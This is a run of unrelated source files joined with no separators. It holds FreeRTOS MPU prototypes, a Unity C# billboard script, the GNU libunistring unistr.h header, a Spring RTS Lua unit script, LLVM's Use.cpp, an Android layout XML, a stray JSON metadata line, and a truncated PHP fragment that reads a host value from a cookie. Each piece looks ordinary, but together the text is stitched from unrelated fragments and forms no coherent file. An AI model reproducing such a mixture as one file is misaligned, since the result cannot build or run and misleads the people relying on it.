EventGroupHandle_t MPU_xEventGroupCreate( void );
EventGroupHandle_t MPU_xEventGroupCreateStatic( StaticEventGroup_t *pxEventGroupBuffer );
EventBits_t MPU_xEventGroupWaitBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToWaitFor, const BaseType_t xClearOnExit, const BaseType_t xWaitForAllBits, TickType_t xTicksToWait );
EventBits_t MPU_xEventGroupClearBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToClear );
EventBits_t MPU_xEventGroupSetBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToSet );
EventBits_t MPU_xEventGroupSync( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToSet, const EventBits_t uxBitsToWaitFor, TickType_t xTicksToWait );
void MPU_vEventGroupDelete( EventGroupHandle_t xEventGroup );
UBaseType_t MPU_uxEventGroupGetNumber( void* xEventGroup );
#endif /* MPU_PROTOTYPES_H */
using UnityEngine;
using System.Collections;
public class BillboardLaub: MonoBehaviour {
private Transform mainCamTransform;
private Transform cachedTransform;
// Use this for initialization
void Start () {
mainCamTransform = Camera.main.transform;
cachedTransform = transform;
}
void Update(){
if (mainCamTransform.InverseTransformPoint( cachedTransform.position).z>=0){
Vector3 v = mainCamTransform.position - cachedTransform.position;
v.x=v.z=0;
cachedTransform.LookAt( mainCamTransform.position-v);
GetComponent<Renderer>().enabled = true;
}
else{
GetComponent<Renderer>().enabled = false;
}
}
}
/* Elementary Unicode string functions.
Copyright (C) 2001-2002, 2005-2019 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
#ifndef _UNISTR_H
#define _UNISTR_H
#include "unitypes.h"
/* Get common macros for C. */
#include "unused-parameter.h"
/* Get bool. */
#include <stdbool.h>
/* Get size_t. */
#include <stddef.h>
#ifdef __cplusplus
extern "C" {
#endif
/* Conventions:
All functions prefixed with u8_ operate on UTF-8 encoded strings.
Their unit is an uint8_t (1 byte).
All functions prefixed with u16_ operate on UTF-16 encoded strings.
Their unit is an uint16_t (a 2-byte word).
All functions prefixed with u32_ operate on UCS-4 encoded strings.
Their unit is an uint32_t (a 4-byte word).
All argument pairs (s, n) denote a Unicode string s[0..n-1] with exactly
n units.
All arguments starting with "str" and the arguments of functions starting
with u8_str/u16_str/u32_str denote a NUL terminated string, i.e. a string
which terminates at the first NUL unit. This termination unit is
considered part of the string for all memory allocation purposes, but
is not considered part of the string for all other logical purposes.
Functions returning a string result take a (resultbuf, lengthp) argument
pair. If resultbuf is not NULL and the result fits into *lengthp units,
it is put in resultbuf, and resultbuf is returned. Otherwise, a freshly
allocated string is returned. In both cases, *lengthp is set to the
length (number of units) of the returned string. In case of error,
NULL is returned and errno is set. */
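/* Example of the (resultbuf, lengthp) convention (illustrative only):

     uint16_t stackbuf[64];
     size_t length = sizeof (stackbuf) / sizeof (stackbuf[0]);
     uint16_t *result = u8_to_u16 (s, n, stackbuf, &length);

     if (result == NULL)
       ...                            // failed, inspect errno
     ...use result[0] .. result[length - 1]...
     if (result != stackbuf)          // a fresh allocation was returned
       free (result);
*/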
/* Elementary string checks. */
/* Check whether an UTF-8 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint8_t *
u8_check (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Check whether an UTF-16 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint16_t *
u16_check (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Check whether an UCS-4 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint32_t *
u32_check (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Elementary string conversions. */
/* Convert an UTF-8 string to an UTF-16 string. */
extern uint16_t *
u8_to_u16 (const uint8_t *s, size_t n, uint16_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-8 string to an UCS-4 string. */
extern uint32_t *
u8_to_u32 (const uint8_t *s, size_t n, uint32_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-16 string to an UTF-8 string. */
extern uint8_t *
u16_to_u8 (const uint16_t *s, size_t n, uint8_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-16 string to an UCS-4 string. */
extern uint32_t *
u16_to_u32 (const uint16_t *s, size_t n, uint32_t *resultbuf,
size_t *lengthp);
/* Convert an UCS-4 string to an UTF-8 string. */
extern uint8_t *
u32_to_u8 (const uint32_t *s, size_t n, uint8_t *resultbuf,
size_t *lengthp);
/* Convert an UCS-4 string to an UTF-16 string. */
extern uint16_t *
u32_to_u16 (const uint32_t *s, size_t n, uint16_t *resultbuf,
size_t *lengthp);
/* Elementary string functions. */
/* Return the length (number of units) of the first character in S, which is
no longer than N. Return 0 if it is the NUL character. Return -1 upon
failure. */
/* Similar to mblen(), except that s must not be NULL. */
extern int
u8_mblen (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_mblen (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_mblen (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Upon failure, *PUC is set to 0xfffd,
and an appropriate number of units is returned.
The number of available units, N, must be > 0. */
/* Similar to mbtowc(), except that puc and s must not be NULL, n must be > 0,
and the NUL character is not treated specially. */
/* The variants with _unsafe suffix are for backward compatibility with
libunistring versions < 0.9.7. */
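/* Note: the inline definitions below handle the common single-unit case
   directly (ASCII for UTF-8, non-surrogate BMP code points for UTF-16)
   and defer to the out-of-line *_aux functions otherwise. */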
#if GNULIB_UNISTR_U8_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u8_mbtouc_unsafe (ucs4_t *puc, const uint8_t *s, size_t n);
# else
extern int
u8_mbtouc_unsafe_aux (ucs4_t *puc, const uint8_t *s, size_t n);
static inline int
u8_mbtouc_unsafe (ucs4_t *puc, const uint8_t *s, size_t n)
{
uint8_t c = *s;
if (c < 0x80)
{
*puc = c;
return 1;
}
else
return u8_mbtouc_unsafe_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u16_mbtouc_unsafe (ucs4_t *puc, const uint16_t *s, size_t n);
# else
extern int
u16_mbtouc_unsafe_aux (ucs4_t *puc, const uint16_t *s, size_t n);
static inline int
u16_mbtouc_unsafe (ucs4_t *puc, const uint16_t *s, size_t n)
{
uint16_t c = *s;
if (c < 0xd800 || c >= 0xe000)
{
*puc = c;
return 1;
}
else
return u16_mbtouc_unsafe_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_mbtouc_unsafe (ucs4_t *puc, const uint32_t *s, size_t n);
# else
static inline int
u32_mbtouc_unsafe (ucs4_t *puc,
const uint32_t *s, size_t n _GL_UNUSED_PARAMETER)
{
uint32_t c = *s;
if (c < 0xd800 || (c >= 0xe000 && c < 0x110000))
*puc = c;
else
/* invalid multibyte character */
*puc = 0xfffd;
return 1;
}
# endif
#endif
#if GNULIB_UNISTR_U8_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u8_mbtouc (ucs4_t *puc, const uint8_t *s, size_t n);
# else
extern int
u8_mbtouc_aux (ucs4_t *puc, const uint8_t *s, size_t n);
static inline int
u8_mbtouc (ucs4_t *puc, const uint8_t *s, size_t n)
{
uint8_t c = *s;
if (c < 0x80)
{
*puc = c;
return 1;
}
else
return u8_mbtouc_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u16_mbtouc (ucs4_t *puc, const uint16_t *s, size_t n);
# else
extern int
u16_mbtouc_aux (ucs4_t *puc, const uint16_t *s, size_t n);
static inline int
u16_mbtouc (ucs4_t *puc, const uint16_t *s, size_t n)
{
uint16_t c = *s;
if (c < 0xd800 || c >= 0xe000)
{
*puc = c;
return 1;
}
else
return u16_mbtouc_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_mbtouc (ucs4_t *puc, const uint32_t *s, size_t n);
# else
static inline int
u32_mbtouc (ucs4_t *puc, const uint32_t *s, size_t n _GL_UNUSED_PARAMETER)
{
uint32_t c = *s;
if (c < 0xd800 || (c >= 0xe000 && c < 0x110000))
*puc = c;
else
/* invalid multibyte character */
*puc = 0xfffd;
return 1;
}
# endif
#endif
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Upon failure, *PUC is set to 0xfffd,
and -1 is returned for an invalid sequence of units, -2 is returned for an
incomplete sequence of units.
The number of available units, N, must be > 0. */
/* Similar to u*_mbtouc(), except that the return value gives more details
about the failure, similar to mbrtowc(). */
#if GNULIB_UNISTR_U8_MBTOUCR || HAVE_LIBUNISTRING
extern int
u8_mbtoucr (ucs4_t *puc, const uint8_t *s, size_t n);
#endif
#if GNULIB_UNISTR_U16_MBTOUCR || HAVE_LIBUNISTRING
extern int
u16_mbtoucr (ucs4_t *puc, const uint16_t *s, size_t n);
#endif
#if GNULIB_UNISTR_U32_MBTOUCR || HAVE_LIBUNISTRING
extern int
u32_mbtoucr (ucs4_t *puc, const uint32_t *s, size_t n);
#endif
/* Put the multibyte character represented by UC in S, returning its
length. Return -1 upon failure, -2 if the number of available units, N,
is too small. The latter case cannot occur if N >= 6/2/1, respectively. */
/* Similar to wctomb(), except that s must not be NULL, and the argument n
must be specified. */
#if GNULIB_UNISTR_U8_UCTOMB || HAVE_LIBUNISTRING
/* Auxiliary function, also used by u8_chr, u8_strchr, u8_strrchr. */
extern int
u8_uctomb_aux (uint8_t *s, ucs4_t uc, int n);
# if !HAVE_INLINE
extern int
u8_uctomb (uint8_t *s, ucs4_t uc, int n);
# else
static inline int
u8_uctomb (uint8_t *s, ucs4_t uc, int n)
{
if (uc < 0x80 && n > 0)
{
s[0] = uc;
return 1;
}
else
return u8_uctomb_aux (s, uc, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_UCTOMB || HAVE_LIBUNISTRING
/* Auxiliary function, also used by u16_chr, u16_strchr, u16_strrchr. */
extern int
u16_uctomb_aux (uint16_t *s, ucs4_t uc, int n);
# if !HAVE_INLINE
extern int
u16_uctomb (uint16_t *s, ucs4_t uc, int n);
# else
static inline int
u16_uctomb (uint16_t *s, ucs4_t uc, int n)
{
if (uc < 0xd800 && n > 0)
{
s[0] = uc;
return 1;
}
else
return u16_uctomb_aux (s, uc, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_UCTOMB || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_uctomb (uint32_t *s, ucs4_t uc, int n);
# else
static inline int
u32_uctomb (uint32_t *s, ucs4_t uc, int n)
{
if (uc < 0xd800 || (uc >= 0xe000 && uc < 0x110000))
{
if (n > 0)
{
*s = uc;
return 1;
}
else
return -2;
}
else
return -1;
}
# endif
#endif
/* Copy N units from SRC to DEST. */
/* Similar to memcpy(). */
extern uint8_t *
u8_cpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_cpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_cpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Copy N units from SRC to DEST, guaranteeing correct behavior for
overlapping memory areas. */
/* Similar to memmove(). */
extern uint8_t *
u8_move (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_move (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_move (uint32_t *dest, const uint32_t *src, size_t n);
/* Set the first N characters of S to UC. UC should be a character that
occupies only 1 unit. */
/* Similar to memset(). */
extern uint8_t *
u8_set (uint8_t *s, ucs4_t uc, size_t n);
extern uint16_t *
u16_set (uint16_t *s, ucs4_t uc, size_t n);
extern uint32_t *
u32_set (uint32_t *s, ucs4_t uc, size_t n);
/* Compare S1 and S2, each of length N. */
/* Similar to memcmp(). */
extern int
u8_cmp (const uint8_t *s1, const uint8_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_cmp (const uint16_t *s1, const uint16_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_cmp (const uint32_t *s1, const uint32_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
/* Compare S1 and S2. */
/* Similar to the gnulib function memcmp2(). */
extern int
u8_cmp2 (const uint8_t *s1, size_t n1, const uint8_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
extern int
u16_cmp2 (const uint16_t *s1, size_t n1, const uint16_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
extern int
u32_cmp2 (const uint32_t *s1, size_t n1, const uint32_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
/* Search the string at S for UC. */
/* Similar to memchr(). */
extern uint8_t *
u8_chr (const uint8_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_chr (const uint16_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_chr (const uint32_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Count the number of Unicode characters in the N units from S. */
/* Similar to mbsnlen(). */
extern size_t
u8_mbsnlen (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_mbsnlen (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_mbsnlen (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Elementary string functions with memory allocation. */
/* Make a freshly allocated copy of S, of length N. */
extern uint8_t *
u8_cpy_alloc (const uint8_t *s, size_t n);
extern uint16_t *
u16_cpy_alloc (const uint16_t *s, size_t n);
extern uint32_t *
u32_cpy_alloc (const uint32_t *s, size_t n);
/* Elementary string functions on NUL terminated strings. */
/* Return the length (number of units) of the first character in S.
Return 0 if it is the NUL character. Return -1 upon failure. */
extern int
u8_strmblen (const uint8_t *s)
_UC_ATTRIBUTE_PURE;
extern int
u16_strmblen (const uint16_t *s)
_UC_ATTRIBUTE_PURE;
extern int
u32_strmblen (const uint32_t *s)
_UC_ATTRIBUTE_PURE;
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Return 0 if it is the NUL
character. Return -1 upon failure. */
extern int
u8_strmbtouc (ucs4_t *puc, const uint8_t *s);
extern int
u16_strmbtouc (ucs4_t *puc, const uint16_t *s);
extern int
u32_strmbtouc (ucs4_t *puc, const uint32_t *s);
/* Forward iteration step. Advances the pointer past the next character,
or returns NULL if the end of the string has been reached. Puts the
character's 'ucs4_t' representation in *PUC. */
extern const uint8_t *
u8_next (ucs4_t *puc, const uint8_t *s);
extern const uint16_t *
u16_next (ucs4_t *puc, const uint16_t *s);
extern const uint32_t *
u32_next (ucs4_t *puc, const uint32_t *s);
/* Backward iteration step. Advances the pointer to point to the previous
character, or returns NULL if the beginning of the string had been reached.
Puts the character's 'ucs4_t' representation in *PUC. */
extern const uint8_t *
u8_prev (ucs4_t *puc, const uint8_t *s, const uint8_t *start);
extern const uint16_t *
u16_prev (ucs4_t *puc, const uint16_t *s, const uint16_t *start);
extern const uint32_t *
u32_prev (ucs4_t *puc, const uint32_t *s, const uint32_t *start);
/* Return the number of units in S. */
/* Similar to strlen(), wcslen(). */
extern size_t
u8_strlen (const uint8_t *s)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strlen (const uint16_t *s)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strlen (const uint32_t *s)
_UC_ATTRIBUTE_PURE;
/* Return the number of units in S, but at most MAXLEN. */
/* Similar to strnlen(), wcsnlen(). */
extern size_t
u8_strnlen (const uint8_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strnlen (const uint16_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strnlen (const uint32_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
/* Copy SRC to DEST. */
/* Similar to strcpy(), wcscpy(). */
extern uint8_t *
u8_strcpy (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_strcpy (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_strcpy (uint32_t *dest, const uint32_t *src);
/* Copy SRC to DEST, returning the address of the terminating NUL in DEST. */
/* Similar to stpcpy(). */
extern uint8_t *
u8_stpcpy (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_stpcpy (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_stpcpy (uint32_t *dest, const uint32_t *src);
/* Copy no more than N units of SRC to DEST. */
/* Similar to strncpy(), wcsncpy(). */
extern uint8_t *
u8_strncpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_strncpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_strncpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Copy no more than N units of SRC to DEST. Return a pointer past the last
non-NUL unit written into DEST. */
/* Similar to stpncpy(). */
extern uint8_t *
u8_stpncpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_stpncpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_stpncpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Append SRC onto DEST. */
/* Similar to strcat(), wcscat(). */
extern uint8_t *
u8_strcat (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_strcat (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_strcat (uint32_t *dest, const uint32_t *src);
/* Append no more than N units of SRC onto DEST. */
/* Similar to strncat(), wcsncat(). */
extern uint8_t *
u8_strncat (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_strncat (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_strncat (uint32_t *dest, const uint32_t *src, size_t n);
/* Compare S1 and S2. */
/* Similar to strcmp(), wcscmp(). */
#ifdef __sun
/* Avoid a collision with the u8_strcmp() function in Solaris 11 libc. */
extern int
u8_strcmp_gnu (const uint8_t *s1, const uint8_t *s2)
_UC_ATTRIBUTE_PURE;
# define u8_strcmp u8_strcmp_gnu
#else
extern int
u8_strcmp (const uint8_t *s1, const uint8_t *s2)
_UC_ATTRIBUTE_PURE;
#endif
extern int
u16_strcmp (const uint16_t *s1, const uint16_t *s2)
_UC_ATTRIBUTE_PURE;
extern int
u32_strcmp (const uint32_t *s1, const uint32_t *s2)
_UC_ATTRIBUTE_PURE;
/* Compare S1 and S2 using the collation rules of the current locale.
Return -1 if S1 < S2, 0 if S1 = S2, 1 if S1 > S2.
Upon failure, set errno and return any value. */
/* Similar to strcoll(), wcscoll(). */
extern int
u8_strcoll (const uint8_t *s1, const uint8_t *s2);
extern int
u16_strcoll (const uint16_t *s1, const uint16_t *s2);
extern int
u32_strcoll (const uint32_t *s1, const uint32_t *s2);
/* Compare no more than N units of S1 and S2. */
/* Similar to strncmp(), wcsncmp(). */
extern int
u8_strncmp (const uint8_t *s1, const uint8_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_strncmp (const uint16_t *s1, const uint16_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_strncmp (const uint32_t *s1, const uint32_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
/* Duplicate S, returning an identical malloc'd string. */
/* Similar to strdup(), wcsdup(). */
extern uint8_t *
u8_strdup (const uint8_t *s);
extern uint16_t *
u16_strdup (const uint16_t *s);
extern uint32_t *
u32_strdup (const uint32_t *s);
/* Find the first occurrence of UC in STR. */
/* Similar to strchr(), wcschr(). */
extern uint8_t *
u8_strchr (const uint8_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strchr (const uint16_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strchr (const uint32_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Find the last occurrence of UC in STR. */
/* Similar to strrchr(), wcsrchr(). */
extern uint8_t *
u8_strrchr (const uint8_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strrchr (const uint16_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strrchr (const uint32_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Return the length of the initial segment of STR which consists entirely
of Unicode characters not in REJECT. */
/* Similar to strcspn(), wcscspn(). */
extern size_t
u8_strcspn (const uint8_t *str, const uint8_t *reject)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strcspn (const uint16_t *str, const uint16_t *reject)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strcspn (const uint32_t *str, const uint32_t *reject)
_UC_ATTRIBUTE_PURE;
/* Return the length of the initial segment of STR which consists entirely
of Unicode characters in ACCEPT. */
/* Similar to strspn(), wcsspn(). */
extern size_t
u8_strspn (const uint8_t *str, const uint8_t *accept)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strspn (const uint16_t *str, const uint16_t *accept)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strspn (const uint32_t *str, const uint32_t *accept)
_UC_ATTRIBUTE_PURE;
/* Find the first occurrence in STR of any character in ACCEPT. */
/* Similar to strpbrk(), wcspbrk(). */
extern uint8_t *
u8_strpbrk (const uint8_t *str, const uint8_t *accept)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strpbrk (const uint16_t *str, const uint16_t *accept)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strpbrk (const uint32_t *str, const uint32_t *accept)
_UC_ATTRIBUTE_PURE;
/* Find the first occurrence of NEEDLE in HAYSTACK. */
/* Similar to strstr(), wcsstr(). */
extern uint8_t *
u8_strstr (const uint8_t *haystack, const uint8_t *needle)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strstr (const uint16_t *haystack, const uint16_t *needle)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strstr (const uint32_t *haystack, const uint32_t *needle)
_UC_ATTRIBUTE_PURE;
/* Test whether STR starts with PREFIX. */
extern bool
u8_startswith (const uint8_t *str, const uint8_t *prefix)
_UC_ATTRIBUTE_PURE;
extern bool
u16_startswith (const uint16_t *str, const uint16_t *prefix)
_UC_ATTRIBUTE_PURE;
extern bool
u32_startswith (const uint32_t *str, const uint32_t *prefix)
_UC_ATTRIBUTE_PURE;
/* Test whether STR ends with SUFFIX. */
extern bool
u8_endswith (const uint8_t *str, const uint8_t *suffix)
_UC_ATTRIBUTE_PURE;
extern bool
u16_endswith (const uint16_t *str, const uint16_t *suffix)
_UC_ATTRIBUTE_PURE;
extern bool
u32_endswith (const uint32_t *str, const uint32_t *suffix)
_UC_ATTRIBUTE_PURE;
/* Divide STR into tokens separated by characters in DELIM.
This interface is actually more similar to wcstok than to strtok. */
/* Similar to strtok_r(), wcstok(). */
extern uint8_t *
u8_strtok (uint8_t *str, const uint8_t *delim, uint8_t **ptr);
extern uint16_t *
u16_strtok (uint16_t *str, const uint16_t *delim, uint16_t **ptr);
extern uint32_t *
u32_strtok (uint32_t *str, const uint32_t *delim, uint32_t **ptr);
#ifdef __cplusplus
}
#endif
#endif /* _UNISTR_H */
base, turret, barrel1, firepoint1, dirt = piece('base', 'turret', 'barrel1', 'firepoint1', 'dirt')
local SIG_AIM = {}
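-- SIG_AIM: signal mask for aiming threads. Each AimWeapon call first kills
-- any previous aiming thread via Signal(SIG_AIM), then registers itself
-- with SetSignalMask(SIG_AIM) so it can be killed in turn.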
-- state variables
isMoving = "isMoving"
terrainType = "terrainType"
function script.Create()
StartThread(common.SmokeUnit, {base, turret, barrel1})
end
common = include("headers/common_includes_lus.lua")
function script.setSFXoccupy(setSFXoccupy_argument)
common.setSFXoccupy(setSFXoccupy_argument)
end
function script.StartMoving()
isMoving = true
StartThread(thrust)
end
function script.StopMoving()
isMoving = false
end
function thrust()
common.DirtTrail()
end
local function RestoreAfterDelay()
Sleep(2000)
Turn(turret, y_axis, 0, 5)
Turn(barrel1, x_axis, 0, 5)
end
function script.AimFromWeapon(weaponID)
--Spring.Echo("AimFromWeapon: FireWeapon")
return turret
end
function script.QueryWeapon(weaponID)
--Spring.Echo("QueryWeapon: FireWeapon")
return firepoint1
end
function script.AimWeapon(weaponID, heading, pitch)
Signal(SIG_AIM)
SetSignalMask(SIG_AIM)
Turn(turret, y_axis, heading, 100)
Turn(barrel1, x_axis, -pitch, 100)
WaitForTurn(turret, y_axis)
WaitForTurn(barrel1, x_axis)
StartThread(RestoreAfterDelay)
--Spring.Echo("AimWeapon: FireWeapon")
return true
end
function script.FireWeapon(weaponID)
--Spring.Echo("FireWeapon: FireWeapon")
EmitSfx (firepoint1, 1024)
end
function script.Killed()
Explode(barrel1, SFX.EXPLODE_ON_HIT)
Explode(turret, SFX.EXPLODE_ON_HIT)
return 1 -- spawn the ARMSTUMP_DEAD corpse (the equivalent of "corpsetype = 1;" in BOS)
end
//===-- Use.cpp - Implement the Use class ---------------------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#include "llvm/IR/Use.h"
#include "llvm/IR/User.h"
#include "llvm/IR/Value.h"
#include <new>
namespace llvm {
void Use::swap(Use &RHS) {
if (Val == RHS.Val)
return;
if (Val)
removeFromList();
Value *OldVal = Val;
if (RHS.Val) {
RHS.removeFromList();
Val = RHS.Val;
Val->addUse(*this);
} else {
Val = nullptr;
}
if (OldVal) {
RHS.Val = OldVal;
RHS.Val->addUse(RHS);
} else {
RHS.Val = nullptr;
}
}
User *Use::getUser() const {
const Use *End = getImpliedUser();
const UserRef *ref = reinterpret_cast<const UserRef *>(End);
return ref->getInt() ? ref->getPointer()
: reinterpret_cast<User *>(const_cast<Use *>(End));
}
unsigned Use::getOperandNo() const {
return this - getUser()->op_begin();
}
// Sets up the waymarking algorithm's tags for a series of Uses. See the
// algorithm details here:
//
// http://www.llvm.org/docs/ProgrammersManual.html#the-waymarking-algorithm
//
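// In short: each Use keeps a 2-bit tag in the low bits of its Prev pointer.
// Scanning forward from any Use, the digit tags spell out, in binary, the
// offset to the User object allocated immediately after the final Use, so
// getUser() can find its User without a per-Use back pointer.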
Use *Use::initTags(Use *const Start, Use *Stop) {
ptrdiff_t Done = 0;
while (Done < 20) {
if (Start == Stop--)
return Start;
static const PrevPtrTag tags[20] = {
fullStopTag, oneDigitTag, stopTag, oneDigitTag, oneDigitTag,
stopTag, zeroDigitTag, oneDigitTag, oneDigitTag, stopTag,
zeroDigitTag, oneDigitTag, zeroDigitTag, oneDigitTag, stopTag,
oneDigitTag, oneDigitTag, oneDigitTag, oneDigitTag, stopTag};
new (Stop) Use(tags[Done++]);
}
ptrdiff_t Count = Done;
while (Start != Stop) {
--Stop;
if (!Count) {
new (Stop) Use(stopTag);
++Done;
Count = Done;
} else {
new (Stop) Use(PrevPtrTag(Count & 1));
Count >>= 1;
++Done;
}
}
return Start;
}
void Use::zap(Use *Start, const Use *Stop, bool del) {
while (Start != Stop)
(--Stop)->~Use();
if (del)
::operator delete(Start);
}
const Use *Use::getImpliedUser() const {
const Use *Current = this;
while (true) {
unsigned Tag = (Current++)->Prev.getInt();
switch (Tag) {
case zeroDigitTag:
case oneDigitTag:
continue;
case stopTag: {
++Current;
ptrdiff_t Offset = 1;
while (true) {
unsigned Tag = Current->Prev.getInt();
switch (Tag) {
case zeroDigitTag:
case oneDigitTag:
++Current;
Offset = (Offset << 1) + Tag;
continue;
default:
return Current + Offset;
}
}
}
case fullStopTag:
return Current;
}
}
}
} // End llvm namespace
<?xml version="1.0" encoding="utf-8"?><!--
~ Copyright (c) 2014-2015 Luis M. Gallardo D.
~ All rights reserved. This program and the accompanying materials
~ are made available under the terms of the GNU Lesser General Public License v3.0
~ which accompanies this distribution, and is available at
~ http://www.gnu.org/licenses/lgpl.html
~
-->
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:orientation="horizontal">
<LinearLayout
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:orientation="horizontal"
android:paddingRight="10dp"
android:paddingTop="10dp"
android:paddingBottom="10dp"
android:background="?backgroundSelector" >
<ImageView
android:id="@+id/icon"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_marginEnd="5dp"
android:layout_marginRight="5dp"
android:contentDescription="@string/icon"
android:src="@drawable/ic_action_recheck" />
<LinearLayout
android:layout_width="0dp"
android:layout_height="wrap_content"
android:layout_weight="1"
android:orientation="vertical">
<TextView
android:id="@+id/name"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="name"
android:textSize="15sp"
android:textStyle="bold" />
<LinearLayout
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:orientation="horizontal">
<TextView
android:id="@+id/info"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="info"
android:textSize="13sp" />
</LinearLayout>
</LinearLayout>
</LinearLayout>
</LinearLayout> | {
"pile_set_name": "Github"
} |
<?php
$cbhost = $_COOKIE['host'];
